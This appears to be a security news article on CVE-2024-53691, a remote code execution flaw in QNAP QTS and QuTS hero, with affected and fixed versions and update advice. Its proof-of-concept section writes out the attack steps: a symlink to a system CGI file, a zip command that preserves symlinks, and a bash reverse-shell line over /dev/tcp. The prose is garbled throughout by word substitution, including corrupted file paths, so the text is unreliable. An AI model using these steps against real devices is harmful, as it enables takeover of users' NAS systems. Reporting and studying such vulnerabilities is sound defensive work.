A important distant code execution (RCE) vulnerability, tracked as CVE-2024-53691, has lately come to mild, affecting customers of QNAP’s QTS and QuTS Hero working programs.
This vulnerability permits distant attackers with person entry privileges to traverse the file system and run arbitrary code on affected programs.
With a CVSS rating of 8.7, the severity of this vulnerability underscores the pressing want for QNAP customers to use really helpful updates.
Discovery and Influence
As reported on April 22, 2024, CVE-2024-53691 permits attackers to take advantage of a hyperlink following a vulnerability.
By leveraging their current entry rights, they’ll add a symbolic hyperlink by way of a ZIP file and manipulate the system’s encrypt/decrypt capabilities to realize arbitrary file write capabilities.
Examine Actual-World Malicious Hyperlinks & Phishing Assaults With Risk Intelligence Lookup - Strive for Free
This exploitation can escalate the attacker’s privileges and lead to full system compromise, executing code as the basis person.
The vulnerability primarily impacts QTS variations 5.1.x and QuTS hero h5.1.x. Patches had been launched on September 7, 2024, by way of the next fastened variations:
- QTS: 5.2.0.2802 construct 20240620 and later
- QuTS hero: 5.2.0.2802 construct 20240620 and later
Affected Variations
- Affected: QTS 5.1.x, QuTS hero h5.1.x
- Mounted: QTS 5.2.0.2802 construct 20240620 and later, QuTS hero h5.2.0.2802 construct 20240620 and later
Proof of Idea (PoC) Exploit Launched
Following the invention, a proof-of-concept (PoC) exploit has been launched by Github, demonstrating the exploitation of CVE-2024-53691.
The exploit includes a number of key steps, starting with making a symbolic hyperlink to an executable file that the attacker can use to realize shell entry. Beneath is an outline of the method:
- Create a Symbolic Hyperlink:
The attacker creates a symlink that factors to a delicate file. For instance:
ln -s /house/httpd/cgi-bin/restore_config.cgi hyperlink.txt- Zip and Add:
The symlink is zipped and uploaded to the QNAP gadget by way of its net interface. The attacker can use the next instructions:
zip --symlink pwn.zip hyperlink.txt- Payload Preparation:
A payload file containing a reverse shell script is created, permitting the attacker to ascertain a distant connection:
#!/bin/sh
bash -c "bash -i >& /dev/tcp// 0>&1" & - Execution Set off:
As soon as the ZIP file is extracted and the payload is executed, the attacker can acquire shell entry as an admin.
QNAP strongly advises customers to replace their programs to fastened variations as quickly as doable to mitigate potential dangers related to this vulnerability. To replace:
- Log in to the QTS or QuTS Hero interface as an administrator.
- Navigate to Management Panel > System > Firmware Replace.
- Click on Test for Replace to obtain and set up any obtainable updates.
Customers must also usually monitor their gadgets for any unauthorized entry and implement further safety measures corresponding to community firewalls and intrusion detection programs.
The disclosure of CVE-2024-53691 highlights the significance of cybersecurity vigilance and the necessity for normal software program updates.
By taking proactive steps to safe their gadgets, QNAP customers can defend themselves from potential exploitation of this critical vulnerability.
Integrating Software Safety into Your CI/CD Workflows Utilizing Jenkins & Jira -> Free Webinar